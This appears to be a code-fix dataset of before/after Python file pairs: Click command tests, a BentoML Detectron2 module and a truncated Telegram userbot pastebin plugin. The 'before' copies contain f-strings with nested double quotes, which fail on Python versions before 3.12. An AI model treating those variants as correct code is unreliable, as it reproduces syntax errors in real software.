click.echo(f"{ctx.params}")
@cli.command()
@click.option("-a")
@click.option("-b")
@click.pass_context
def second(ctx, **kwargs):
click.echo(f"{ctx.params}")
ctx.forward(first)
result = runner.invoke(cli, ["second", "-a", "foo", "-b", "bar"])
assert not result.exception
assert result.output == "{'a': 'foo', 'b': 'bar'}\n{'a': 'foo', 'b': 'bar'}\n"
def test_auto_shorthelp(runner):
@click.group()
def cli():
pass
@cli.command()
def short():
"""This is a short text."""
@cli.command()
def special_chars():
"""Login and store the token in ~/.netrc."""
@cli.command()
def long():
"""This is a long text that is too long to show as short help
and will be truncated instead."""
result = runner.invoke(cli, ["--help"])
assert (
re.search(
r"Commands:\n\s+"
r"long\s+This is a long text that is too long to show as short help"
r"\.\.\.\n\s+"
r"short\s+This is a short text\.\n\s+"
r"special-chars\s+Login and store the token in ~/.netrc\.\s*",
result.output,
)
is not None
)
def test_no_args_is_help(runner):
@click.command(no_args_is_help=True)
def cli():
pass
result = runner.invoke(cli, [])
assert result.exit_code == 0
assert "Show this message and exit." in result.output
def test_default_maps(runner):
@click.group()
def cli():
pass
@cli.command()
@click.option("--name", default="normal")
def foo(name):
click.echo(name)
result = runner.invoke(cli, ["foo"], default_map={"foo": {"name": "changed"}})
assert not result.exception
assert result.output == "changed\n"
def test_group_with_args(runner):
@click.group()
@click.argument("obj")
def cli(obj):
click.echo(f"obj={obj}")
@cli.command()
def move():
click.echo("move")
result = runner.invoke(cli, [])
assert result.exit_code == 0
assert "Show this message and exit." in result.output
result = runner.invoke(cli, ["obj1"])
assert result.exit_code == 2
assert "Error: Missing command." in result.output
result = runner.invoke(cli, ["obj1", "--help"])
assert result.exit_code == 0
assert "Show this message and exit." in result.output
result = runner.invoke(cli, ["obj1", "move"])
assert result.exit_code == 0
assert result.output == "obj=obj1\nmove\n"
def test_base_command(runner):
import optparse
@click.group()
def cli():
pass
class OptParseCommand(click.BaseCommand):
def __init__(self, name, parser, callback):
super().__init__(name)
self.parser = parser
self.callback = callback
def parse_args(self, ctx, args):
try:
opts, args = parser.parse_args(args)
except Exception as e:
ctx.fail(str(e))
ctx.args = args
ctx.params = vars(opts)
def get_usage(self, ctx):
return self.parser.get_usage()
def get_help(self, ctx):
return self.parser.format_help()
def invoke(self, ctx):
ctx.invoke(self.callback, ctx.args, **ctx.params)
parser = optparse.OptionParser(usage="Usage: foo test [OPTIONS]")
parser.add_option(
"-f", "--file", dest="filename", help="write report to FILE", metavar="FILE"
)
parser.add_option(
"-q",
"--quiet",
action="store_false",
dest="verbose",
default=True,
help="don't print status messages to stdout",
)
def test_callback(args, filename, verbose):
click.echo(" ".join(args))
click.echo(filename)
click.echo(verbose)
cli.add_command(OptParseCommand("test", parser, test_callback))
result = runner.invoke(
cli, ["test", "-f", "test.txt", "-q", "whatever.txt", "whateverelse.txt"]
)
assert not result.exception
assert result.output.splitlines() == [
"whatever.txt whateverelse.txt",
"test.txt",
"False",
]
result = runner.invoke(cli, ["test", "--help"])
assert not result.exception
assert result.output.splitlines() == [
"Usage: foo test [OPTIONS]",
"",
"Options:",
" -h, --help show this help message and exit",
" -f FILE, --file=FILE write report to FILE",
" -q, --quiet don't print status messages to stdout",
]
def test_object_propagation(runner):
for chain in False, True:
@click.group(chain=chain)
@click.option("--debug/--no-debug", default=False)
@click.pass_context
def cli(ctx, debug):
if ctx.obj is None:
ctx.obj = {}
ctx.obj["DEBUG"] = debug
@cli.command()
@click.pass_context
def sync(ctx):
click.echo(f"Debug is {"on" if ctx.obj["DEBUG"] else "off"}")
result = runner.invoke(cli, ["sync"])
assert result.exception is None
assert result.output == "Debug is off\n"
def test_other_command_invoke_with_defaults(runner):
@click.command()
@click.pass_context
def cli(ctx):
return ctx.invoke(other_cmd)
@click.command()
@click.option("--foo", type=click.INT, default=42)
@click.pass_context
def other_cmd(ctx, foo):
assert ctx.info_name == "other-cmd"
click.echo(foo)
result = runner.invoke(cli, [])
assert not result.exception
assert result.output == "42\n"
def test_invoked_subcommand(runner):
@click.group(invoke_without_command=True)
@click.pass_context
def cli(ctx):
if ctx.invoked_subcommand is None:
click.echo("no subcommand, use default")
ctx.invoke(sync)
else:
click.echo("invoke subcommand")
@cli.command()
def sync():
click.echo("in subcommand")
result = runner.invoke(cli, ["sync"])
assert not result.exception
assert result.output == "invoke subcommand\nin subcommand\n"
result = runner.invoke(cli)
assert not result.exception
assert result.output == "no subcommand, use default\nin subcommand\n"
def test_aliased_command_canonical_name(runner):
class AliasedGroup(click.Group):
def get_command(self, ctx, cmd_name):
return push
cli = AliasedGroup()
@cli.command()
def push():
click.echo("push command")
result = runner.invoke(cli, ["pu", "--help"])
assert not result.exception
assert result.output.startswith("Usage: root push [OPTIONS]")
def test_unprocessed_options(runner):
@click.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("args", nargs=-1, type=click.UNPROCESSED)
@click.option("--verbose", "-v", count=True)
def cli(verbose, args):
click.echo(f"Verbosity: {verbose}")
click.echo(f"Args: {"|".join(args)}")
result = runner.invoke(cli, ["-foo", "-vvvvx", "--muhaha", "x", "y", "-x"])
assert not result.exception
assert result.output.splitlines() == [
"Verbosity: 4",
"Args: -foo|-x|--muhaha|x|y|-x",
]
def test_deprecated_in_help_messages(runner):
@click.command(deprecated=True)
def cmd_with_help():
"""CLI HELP"""
pass
result = runner.invoke(cmd_with_help, ["--help"])
assert "(Deprecated)" in result.output
@click.command(deprecated=True)
def cmd_without_help():
pass
result = runner.invoke(cmd_without_help, ["--help"])
assert "(Deprecated)" in result.output
def test_deprecated_in_invocation(runner):
@click.command(deprecated=True)
def deprecated_cmd():
pass
result = runner.invoke(deprecated_cmd)
assert "DeprecationWarning:" in result.output
| import re
import click
def test_other_command_invoke(runner):
@click.command()
@click.pass_context
def cli(ctx):
return ctx.invoke(other_cmd, arg=42)
@click.command()
@click.argument("arg", type=click.INT)
def other_cmd(arg):
click.echo(arg)
result = runner.invoke(cli, [])
assert not result.exception
assert result.output == "42\n"
def test_other_command_forward(runner):
cli = click.Group()
@cli.command()
@click.option("--count", default=1)
def test(count):
click.echo(f"Count: {count:d}")
@cli.command()
@click.option("--count", default=1)
@click.pass_context
def dist(ctx, count):
ctx.forward(test)
ctx.invoke(test, count=42)
result = runner.invoke(cli, ["dist"])
assert not result.exception
assert result.output == "Count: 1\nCount: 42\n"
def test_forwarded_params_consistency(runner):
cli = click.Group()
@cli.command()
@click.option("-a")
@click.pass_context
def first(ctx, **kwargs):
click.echo(f"{ctx.params}")
@cli.command()
@click.option("-a")
@click.option("-b")
@click.pass_context
def second(ctx, **kwargs):
click.echo(f"{ctx.params}")
ctx.forward(first)
result = runner.invoke(cli, ["second", "-a", "foo", "-b", "bar"])
assert not result.exception
assert result.output == "{'a': 'foo', 'b': 'bar'}\n{'a': 'foo', 'b': 'bar'}\n"
def test_auto_shorthelp(runner):
@click.group()
def cli():
pass
@cli.command()
def short():
"""This is a short text."""
@cli.command()
def special_chars():
"""Login and store the token in ~/.netrc."""
@cli.command()
def long():
"""This is a long text that is too long to show as short help
and will be truncated instead."""
result = runner.invoke(cli, ["--help"])
assert (
re.search(
r"Commands:\n\s+"
r"long\s+This is a long text that is too long to show as short help"
r"\.\.\.\n\s+"
r"short\s+This is a short text\.\n\s+"
r"special-chars\s+Login and store the token in ~/.netrc\.\s*",
result.output,
)
is not None
)
def test_no_args_is_help(runner):
@click.command(no_args_is_help=True)
def cli():
pass
result = runner.invoke(cli, [])
assert result.exit_code == 0
assert "Show this message and exit." in result.output
def test_default_maps(runner):
@click.group()
def cli():
pass
@cli.command()
@click.option("--name", default="normal")
def foo(name):
click.echo(name)
result = runner.invoke(cli, ["foo"], default_map={"foo": {"name": "changed"}})
assert not result.exception
assert result.output == "changed\n"
def test_group_with_args(runner):
@click.group()
@click.argument("obj")
def cli(obj):
click.echo(f"obj={obj}")
@cli.command()
def move():
click.echo("move")
result = runner.invoke(cli, [])
assert result.exit_code == 0
assert "Show this message and exit." in result.output
result = runner.invoke(cli, ["obj1"])
assert result.exit_code == 2
assert "Error: Missing command." in result.output
result = runner.invoke(cli, ["obj1", "--help"])
assert result.exit_code == 0
assert "Show this message and exit." in result.output
result = runner.invoke(cli, ["obj1", "move"])
assert result.exit_code == 0
assert result.output == "obj=obj1\nmove\n"
def test_base_command(runner):
import optparse
@click.group()
def cli():
pass
class OptParseCommand(click.BaseCommand):
def __init__(self, name, parser, callback):
super().__init__(name)
self.parser = parser
self.callback = callback
def parse_args(self, ctx, args):
try:
opts, args = parser.parse_args(args)
except Exception as e:
ctx.fail(str(e))
ctx.args = args
ctx.params = vars(opts)
def get_usage(self, ctx):
return self.parser.get_usage()
def get_help(self, ctx):
return self.parser.format_help()
def invoke(self, ctx):
ctx.invoke(self.callback, ctx.args, **ctx.params)
parser = optparse.OptionParser(usage="Usage: foo test [OPTIONS]")
parser.add_option(
"-f", "--file", dest="filename", help="write report to FILE", metavar="FILE"
)
parser.add_option(
"-q",
"--quiet",
action="store_false",
dest="verbose",
default=True,
help="don't print status messages to stdout",
)
def test_callback(args, filename, verbose):
click.echo(" ".join(args))
click.echo(filename)
click.echo(verbose)
cli.add_command(OptParseCommand("test", parser, test_callback))
result = runner.invoke(
cli, ["test", "-f", "test.txt", "-q", "whatever.txt", "whateverelse.txt"]
)
assert not result.exception
assert result.output.splitlines() == [
"whatever.txt whateverelse.txt",
"test.txt",
"False",
]
result = runner.invoke(cli, ["test", "--help"])
assert not result.exception
assert result.output.splitlines() == [
"Usage: foo test [OPTIONS]",
"",
"Options:",
" -h, --help show this help message and exit",
" -f FILE, --file=FILE write report to FILE",
" -q, --quiet don't print status messages to stdout",
]
def test_object_propagation(runner):
for chain in False, True:
@click.group(chain=chain)
@click.option("--debug/--no-debug", default=False)
@click.pass_context
def cli(ctx, debug):
if ctx.obj is None:
ctx.obj = {}
ctx.obj["DEBUG"] = debug
@cli.command()
@click.pass_context
def sync(ctx):
click.echo(f"Debug is {'on' if ctx.obj['DEBUG'] else 'off'}")
result = runner.invoke(cli, ["sync"])
assert result.exception is None
assert result.output == "Debug is off\n"
def test_other_command_invoke_with_defaults(runner):
@click.command()
@click.pass_context
def cli(ctx):
return ctx.invoke(other_cmd)
@click.command()
@click.option("--foo", type=click.INT, default=42)
@click.pass_context
def other_cmd(ctx, foo):
assert ctx.info_name == "other-cmd"
click.echo(foo)
result = runner.invoke(cli, [])
assert not result.exception
assert result.output == "42\n"
def test_invoked_subcommand(runner):
@click.group(invoke_without_command=True)
@click.pass_context
def cli(ctx):
if ctx.invoked_subcommand is None:
click.echo("no subcommand, use default")
ctx.invoke(sync)
else:
click.echo("invoke subcommand")
@cli.command()
def sync():
click.echo("in subcommand")
result = runner.invoke(cli, ["sync"])
assert not result.exception
assert result.output == "invoke subcommand\nin subcommand\n"
result = runner.invoke(cli)
assert not result.exception
assert result.output == "no subcommand, use default\nin subcommand\n"
def test_aliased_command_canonical_name(runner):
class AliasedGroup(click.Group):
def get_command(self, ctx, cmd_name):
return push
cli = AliasedGroup()
@cli.command()
def push():
click.echo("push command")
result = runner.invoke(cli, ["pu", "--help"])
assert not result.exception
assert result.output.startswith("Usage: root push [OPTIONS]")
def test_unprocessed_options(runner):
@click.command(context_settings=dict(ignore_unknown_options=True))
@click.argument("args", nargs=-1, type=click.UNPROCESSED)
@click.option("--verbose", "-v", count=True)
def cli(verbose, args):
click.echo(f"Verbosity: {verbose}")
click.echo(f"Args: {'|'.join(args)}")
result = runner.invoke(cli, ["-foo", "-vvvvx", "--muhaha", "x", "y", "-x"])
assert not result.exception
assert result.output.splitlines() == [
"Verbosity: 4",
"Args: -foo|-x|--muhaha|x|y|-x",
]
def test_deprecated_in_help_messages(runner):
@click.command(deprecated=True)
def cmd_with_help():
"""CLI HELP"""
pass
result = runner.invoke(cmd_with_help, ["--help"])
assert "(Deprecated)" in result.output
@click.command(deprecated=True)
def cmd_without_help():
pass
result = runner.invoke(cmd_without_help, ["--help"])
assert "(Deprecated)" in result.output
def test_deprecated_in_invocation(runner):
@click.command(deprecated=True)
def deprecated_cmd():
pass
result = runner.invoke(deprecated_cmd)
assert "DeprecationWarning:" in result.output
|
import os
import typing as t
from typing import TYPE_CHECKING
import numpy as np
from torch._C import device
from simple_di import inject
from simple_di import Provide
import bentoml
from bentoml import Tag
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..models import PTH_EXT
from ..models import YAML_EXT
from ..models import SAVE_NAMESPACE
from ..utils.pkg import get_pkg_version
from ..runner.utils import Params
from ..configuration.containers import BentoMLContainer
if TYPE_CHECKING:
from .. import external_typing as ext
from ..models import ModelStore
try:
# pylint: disable=unused-import
import torch
import detectron2 # noqa F401
import detectron2.config as config
import detectron2.modeling as modeling
import detectron2.checkpoint as checkpoint
from detectron2.checkpoint import DetectionCheckpointer
except ImportError: # pragma: no cover
raise MissingDependencyException(
"""detectron2 is required in order to use module `bentoml.detectron`,
install detectron2 with `pip install detectron2`. For more
information, refers to
https://detectron2.readthedocs.io/en/latest/tutorials/install.html
"""
)
MODULE_NAME = "bentoml.detectron"
@inject
def load(
tag: t.Union[str, Tag],
device: str = "cpu",
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "torch.nn.Module":
"""
Load a model from BentoML local modelstore with given tag.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
device (:code:`str`, `optional`, default to :code:`cpu`):
Device type to cast model. Default behaviour similar to :obj:`torch.device("cuda")` Options: "cuda" or "cpu". If None is specified then return default config.MODEL.DEVICE
model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`torch.nn.Module`: an instance of `torch.nn.Module`
Examples:
.. code-block:: python
import bentoml
model = bentoml.detectron.load("my_detectron_model")
""" # noqa: LN001
model_info = model_store.get(tag)
if model_info.info.module not in (MODULE_NAME, __name__):
raise BentoMLException(
f"Model {tag} was saved with module {model_info.info.module}, failed loading with {MODULE_NAME}."
)
cfg: config.CfgNode = config.get_cfg()
weight_path = model_info.path_of(f"{SAVE_NAMESPACE}{PTH_EXT}")
yaml_path = model_info.path_of(f"{SAVE_NAMESPACE}{YAML_EXT}")
if os.path.isfile(yaml_path):
cfg.merge_from_file(yaml_path)
if device:
cfg.MODEL.DEVICE = device
model: "torch.nn.Module" = modeling.build_model(cfg)
if device:
model.to(device)
model.eval()
checkpointer: "DetectionCheckpointer" = checkpoint.DetectionCheckpointer(model)
checkpointer.load(weight_path)
return model
@inject
def save(
name: str,
model: "torch.nn.Module",
*,
model_config: t.Optional[config.CfgNode] = None,
labels: t.Optional[t.Dict[str, str]] = None,
custom_objects: t.Optional[t.Dict[str, t.Any]] = None,
metadata: t.Optional[t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
"""
Save a model instance to BentoML modelstore.
Args:
name (:code:`str`):
Name for given model instance. This should pass Python identifier check.
model (`torch.nn.Module`):
Instance of detectron2 model to be saved.
model_config (`detectron2.config.CfgNode`, `optional`, default to :code:`None`):
model config from :meth:`detectron2.model_zoo.get_config_file`
labels (:code:`Dict[str, str]`, `optional`, default to :code:`None`):
user-defined labels for managing models, e.g. team=nlp, stage=dev
custom_objects (:code:`Dict[str, Any]]`, `optional`, default to :code:`None`):
user-defined additional python objects to be saved alongside the model,
e.g. a tokenizer instance, preprocessor function, model configuration json
metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
Custom metadata for given model.
model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
Examples:
.. code-block:: python
import bentoml
# import some common detectron2 utilities
import detectron2
from detectron2 import model_zoo
from detectron2.config import get_cfg
from detectron2.modeling import build_model
model_url: str = "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml"
cfg: "CfgNode" = get_cfg()
cfg.merge_from_file(model_zoo.get_config_file(model_url))
# set threshold for this model
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5
cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(model_url)
cloned = cfg.clone()
cloned.MODEL.DEVICE = "cpu"
model: torch.nn.Module = build_model(cloned)
tag = bentoml.detectron.save(
"my_detectron_model",
model,
model_config=cfg,
)
# load the model back:
loaded = bentoml.detectron.load("my_detectron_model:latest")
# or:
loaded = bentoml.detectron.load(tag)
""" # noqa
context: t.Dict[str, t.Any] = {
"framework_name": "detectron2",
"pip_dependencies": [
f"detectron2=={get_pkg_version("detectron2")}",
f"torch=={get_pkg_version("torch")}",
],
}
options: t.Dict[str, t.Any] = dict()
with bentoml.models.create(
name,
module=MODULE_NAME,
labels=labels,
custom_objects=custom_objects,
options=options,
context=context,
metadata=metadata,
) as _model:
checkpointer = checkpoint.DetectionCheckpointer(model, save_dir=_model.path)
checkpointer.save(SAVE_NAMESPACE)
if model_config:
with open(
_model.path_of(f"{SAVE_NAMESPACE}{YAML_EXT}"),
"w",
encoding="utf-8",
) as ouf:
ouf.write(model_config.dump())
return _model.tag
from .common.model_runner import BaseModelRunner
class _DetectronRunner(BaseModelRunner):
def __init__(
self,
tag: t.Union[str, Tag],
predict_fn_name: str,
name: t.Optional[str] = None,
):
super().__init__(tag, name=name)
self._predict_fn_name = predict_fn_name
@property
def num_replica(self) -> int:
if self.resource_quota.on_gpu:
return len(self.resource_quota.gpus)
return 1
@property
def _device(self) -> str:
if self.resource_quota.on_gpu:
return "cuda"
return "cpu"
def _setup(self) -> None:
self._model = load(self._tag, self._device, model_store=self.model_store)
self._predict_fn = getattr(self._model, self._predict_fn_name)
def _run_batch( # type: ignore
self,
*args: t.Union["ext.NpNDArray", torch.Tensor],
) -> "ext.NpNDArray":
params = Params[t.Union["ext.NpNDArray", torch.Tensor]](*args)
def _mapping(item: t.Union["ext.NpNDArray", torch.Tensor]) -> torch.Tensor:
if isinstance(item, np.ndarray):
return torch.Tensor(item, device=self._device)
return item
params = params.map(_mapping)
inputs = [{"image": image} for image in params.args]
res: "torch.Tensor" = self._predict_fn(inputs)
return np.asarray(res) # type: ignore
def load_runner(
tag: t.Union[str, Tag],
predict_fn_name: str = "__call__",
*,
name: t.Optional[str] = None,
) -> _DetectronRunner:
"""
Runner represents a unit of serving logic that can be scaled horizontally to
maximize throughput. :func:`bentoml.detectron.load_runner` implements a Runner class that
wrap around a :obj:`torch.nn.Module` model, which optimize it for the BentoML runtime.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
predict_fn_name (:code:`str`, default to :code:`__call__`):
Options for inference functions. Default to `__call__`
model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.runner.Runner`: Runner instances for :mod:`bentoml.detectron` model
Examples:
.. code-block:: python
import bentoml
import numpy as np
runner = bentoml.detectron.load_runner(tag)
runner.run_batch(np.array([[1,2,3,]]))
"""
return _DetectronRunner(
tag=tag,
predict_fn_name=predict_fn_name,
name=name,
)
| import os
import typing as t
from typing import TYPE_CHECKING
import numpy as np
from torch._C import device
from simple_di import inject
from simple_di import Provide
import bentoml
from bentoml import Tag
from bentoml.exceptions import BentoMLException
from bentoml.exceptions import MissingDependencyException
from ..models import PTH_EXT
from ..models import YAML_EXT
from ..models import SAVE_NAMESPACE
from ..utils.pkg import get_pkg_version
from ..runner.utils import Params
from ..configuration.containers import BentoMLContainer
if TYPE_CHECKING:
from .. import external_typing as ext
from ..models import ModelStore
try:
# pylint: disable=unused-import
import torch
import detectron2 # noqa F401
import detectron2.config as config
import detectron2.modeling as modeling
import detectron2.checkpoint as checkpoint
from detectron2.checkpoint import DetectionCheckpointer
except ImportError: # pragma: no cover
raise MissingDependencyException(
"""detectron2 is required in order to use module `bentoml.detectron`,
install detectron2 with `pip install detectron2`. For more
information, refers to
https://detectron2.readthedocs.io/en/latest/tutorials/install.html
"""
)
MODULE_NAME = "bentoml.detectron"
@inject
def load(
tag: t.Union[str, Tag],
device: str = "cpu",
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> "torch.nn.Module":
"""
Load a model from BentoML local modelstore with given tag.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
device (:code:`str`, `optional`, default to :code:`cpu`):
Device type to cast model. Default behaviour similar to :obj:`torch.device("cuda")` Options: "cuda" or "cpu". If None is specified then return default config.MODEL.DEVICE
model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`torch.nn.Module`: an instance of `torch.nn.Module`
Examples:
.. code-block:: python
import bentoml
model = bentoml.detectron.load("my_detectron_model")
""" # noqa: LN001
model_info = model_store.get(tag)
if model_info.info.module not in (MODULE_NAME, __name__):
raise BentoMLException(
f"Model {tag} was saved with module {model_info.info.module}, failed loading with {MODULE_NAME}."
)
cfg: config.CfgNode = config.get_cfg()
weight_path = model_info.path_of(f"{SAVE_NAMESPACE}{PTH_EXT}")
yaml_path = model_info.path_of(f"{SAVE_NAMESPACE}{YAML_EXT}")
if os.path.isfile(yaml_path):
cfg.merge_from_file(yaml_path)
if device:
cfg.MODEL.DEVICE = device
model: "torch.nn.Module" = modeling.build_model(cfg)
if device:
model.to(device)
model.eval()
checkpointer: "DetectionCheckpointer" = checkpoint.DetectionCheckpointer(model)
checkpointer.load(weight_path)
return model
@inject
def save(
name: str,
model: "torch.nn.Module",
*,
model_config: t.Optional[config.CfgNode] = None,
labels: t.Optional[t.Dict[str, str]] = None,
custom_objects: t.Optional[t.Dict[str, t.Any]] = None,
metadata: t.Optional[t.Dict[str, t.Any]] = None,
model_store: "ModelStore" = Provide[BentoMLContainer.model_store],
) -> Tag:
"""
Save a model instance to BentoML modelstore.
Args:
name (:code:`str`):
Name for given model instance. This should pass Python identifier check.
model (`torch.nn.Module`):
Instance of detectron2 model to be saved.
model_config (`detectron2.config.CfgNode`, `optional`, default to :code:`None`):
model config from :meth:`detectron2.model_zoo.get_config_file`
labels (:code:`Dict[str, str]`, `optional`, default to :code:`None`):
user-defined labels for managing models, e.g. team=nlp, stage=dev
custom_objects (:code:`Dict[str, Any]]`, `optional`, default to :code:`None`):
user-defined additional python objects to be saved alongside the model,
e.g. a tokenizer instance, preprocessor function, model configuration json
metadata (:code:`Dict[str, Any]`, `optional`, default to :code:`None`):
Custom metadata for given model.
model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml.Tag`: A :obj:`tag` with a format `name:version` where `name` is the user-defined model's name, and a generated `version` by BentoML.
Examples:
.. code-block:: python
import bentoml
# import some common detectron2 utilities
import detectron2
from detectron2 import model_zoo
from detectron2.config import get_cfg
from detectron2.modeling import build_model
model_url: str = "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml"
cfg: "CfgNode" = get_cfg()
cfg.merge_from_file(model_zoo.get_config_file(model_url))
# set threshold for this model
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.5
cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(model_url)
cloned = cfg.clone()
cloned.MODEL.DEVICE = "cpu"
model: torch.nn.Module = build_model(cloned)
tag = bentoml.detectron.save(
"my_detectron_model",
model,
model_config=cfg,
)
# load the model back:
loaded = bentoml.detectron.load("my_detectron_model:latest")
# or:
loaded = bentoml.detectron.load(tag)
""" # noqa
context: t.Dict[str, t.Any] = {
"framework_name": "detectron2",
"pip_dependencies": [
f"detectron2=={get_pkg_version('detectron2')}",
f"torch=={get_pkg_version('torch')}",
],
}
options: t.Dict[str, t.Any] = dict()
with bentoml.models.create(
name,
module=MODULE_NAME,
labels=labels,
custom_objects=custom_objects,
options=options,
context=context,
metadata=metadata,
) as _model:
checkpointer = checkpoint.DetectionCheckpointer(model, save_dir=_model.path)
checkpointer.save(SAVE_NAMESPACE)
if model_config:
with open(
_model.path_of(f"{SAVE_NAMESPACE}{YAML_EXT}"),
"w",
encoding="utf-8",
) as ouf:
ouf.write(model_config.dump())
return _model.tag
from .common.model_runner import BaseModelRunner
class _DetectronRunner(BaseModelRunner):
def __init__(
self,
tag: t.Union[str, Tag],
predict_fn_name: str,
name: t.Optional[str] = None,
):
super().__init__(tag, name=name)
self._predict_fn_name = predict_fn_name
@property
def num_replica(self) -> int:
if self.resource_quota.on_gpu:
return len(self.resource_quota.gpus)
return 1
@property
def _device(self) -> str:
if self.resource_quota.on_gpu:
return "cuda"
return "cpu"
def _setup(self) -> None:
self._model = load(self._tag, self._device, model_store=self.model_store)
self._predict_fn = getattr(self._model, self._predict_fn_name)
def _run_batch( # type: ignore
self,
*args: t.Union["ext.NpNDArray", torch.Tensor],
) -> "ext.NpNDArray":
params = Params[t.Union["ext.NpNDArray", torch.Tensor]](*args)
def _mapping(item: t.Union["ext.NpNDArray", torch.Tensor]) -> torch.Tensor:
if isinstance(item, np.ndarray):
return torch.Tensor(item, device=self._device)
return item
params = params.map(_mapping)
inputs = [{"image": image} for image in params.args]
res: "torch.Tensor" = self._predict_fn(inputs)
return np.asarray(res) # type: ignore
def load_runner(
tag: t.Union[str, Tag],
predict_fn_name: str = "__call__",
*,
name: t.Optional[str] = None,
) -> _DetectronRunner:
"""
Runner represents a unit of serving logic that can be scaled horizontally to
maximize throughput. :func:`bentoml.detectron.load_runner` implements a Runner class that
wrap around a :obj:`torch.nn.Module` model, which optimize it for the BentoML runtime.
Args:
tag (:code:`Union[str, Tag]`):
Tag of a saved model in BentoML local modelstore.
predict_fn_name (:code:`str`, default to :code:`__call__`):
Options for inference functions. Default to `__call__`
model_store (`~bentoml._internal.models.ModelStore`, default to :code:`BentoMLContainer.model_store`):
BentoML modelstore, provided by DI Container.
Returns:
:obj:`~bentoml._internal.runner.Runner`: Runner instances for :mod:`bentoml.detectron` model
Examples:
.. code-block:: python
import bentoml
import numpy as np
runner = bentoml.detectron.load_runner(tag)
runner.run_batch(np.array([[1,2,3,]]))
"""
return _DetectronRunner(
tag=tag,
predict_fn_name=predict_fn_name,
name=name,
)
|
"""IX.IO pastebin like site
Syntax: .paste
Syntax: .npaste
Syntax: .paster
Syntax: .iffuci
"""
import logging
logging.basicConfig(format='[%(levelname) 5s/%(asctime)s] %(name)s: %(message)s',
level=logging.WARNING)
import asyncio
import os
from datetime import datetime
import requests
from telethon import events
from userbot.utils import admin_cmd
from userbot.uniborgConfig import Config
from telethon.errors.rpcerrorlist import YouBlockedUserError
from requests import exceptions, get, post
def progress(current, total):
logger.info("Downloaded {} of {}\nCompleted {}".format(current, total, (current / total) * 100))
from userbot import CMD_HELP, LOGS, TEMP_DOWNLOAD_DIRECTORY
DOGBIN_URL = "https://del.dog/"
BOTLOG_CHATID = Config.PRIVATE_GROUP_BOT_API_ID
BOTLOG = True
@borg.on(admin_cmd(pattern="paste ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
os.makedirs(Config.TMP_DOWNLOAD_DIRECTORY)
input_str = event.pattern_match.group(1)
message = "SYNTAX: `.paste <long text to include>`"
if input_str:
message = input_str
elif event.reply_to_msg_id:
previous_message = await event.get_reply_message()
if previous_message.media:
downloaded_file_name = await borg.download_media(
previous_message,
Config.TMP_DOWNLOAD_DIRECTORY,
progress_callback=progress
)
m_list = None
with open(downloaded_file_name, "rb") as fd:
m_list = fd.readlines()
message = ""
for m in m_list:
message += m.decode("UTF-8") + "\r\n"
os.remove(downloaded_file_name)
else:
message = previous_message.message
else:
message = "SYNTAX: `.paste <long text to include>`"
url = "https://del.dog/documents"
r = requests.post(url, data=message.encode("UTF-8")).json()
url = f"https://del.dog/{r["key"]}"
end = datetime.now()
ms = (end - start).seconds
if r["isUrl"]:
nurl = f"https://del.dog/v/{r["key"]}"
await event.edit("Dogged to {} in {} seconds. GoTo Original URL: {}".format(url, ms, nurl))
else:
await event.edit("Dogged to {} in {} seconds".format(url, ms))
@borg.on(admin_cmd(outgoing=True, pattern="getpaste(?: |$)(.*)"))
async def get_dogbin_content(dog_url):
""" For .getpaste command, fetches the content of a dogbin URL. """
textx = await dog_url.get_reply_message()
message = dog_url.pattern_match.group(1)
await dog_url.edit("`Getting dogbin content...`")
if textx:
message = str(textx.message)
format_normal = f'{DOGBIN_URL}'
format_view = f'{DOGBIN_URL}v/'
if message.startswith(format_view):
message = message[len(format_view):]
elif message.startswith(format_normal):
message = message[len(format_normal):]
elif message.startswith("del.dog/"):
message = message[len("del.dog/"):]
else:
await dog_url.edit("`Is that even a dogbin url?`")
return
resp = get(f'{DOGBIN_URL}raw/{message}')
try:
resp.raise_for_status()
except exceptions.HTTPError as HTTPErr:
await dog_url.edit(
"Request returned an unsuccessful status code.\n\n" + str(HTTPErr))
return
except exceptions.Timeout as TimeoutErr:
await dog_url.edit("Request timed out." + str(TimeoutErr))
return
except exceptions.TooManyRedirects as RedirectsErr:
await dog_url.edit(
"Request exceeded the configured number of maximum redirections." +
str(RedirectsErr))
return
reply_text = "`Fetched dogbin URL content successfully!`\n\n`Content:` " + resp.text
await dog_url.edit(reply_text)
if BOTLOG:
await dog_url.client.send_message(
BOTLOG_CHATID,
"Get dogbin content query was executed successfully",
)
@borg.on(admin_cmd(pattern="npaste ?(.*)"))
async def _(event):
if event.fwd_from:
return
start = datetime.now()
if not os.path.isdir(Config.TMP_DOWNLOAD_DIRECTORY):
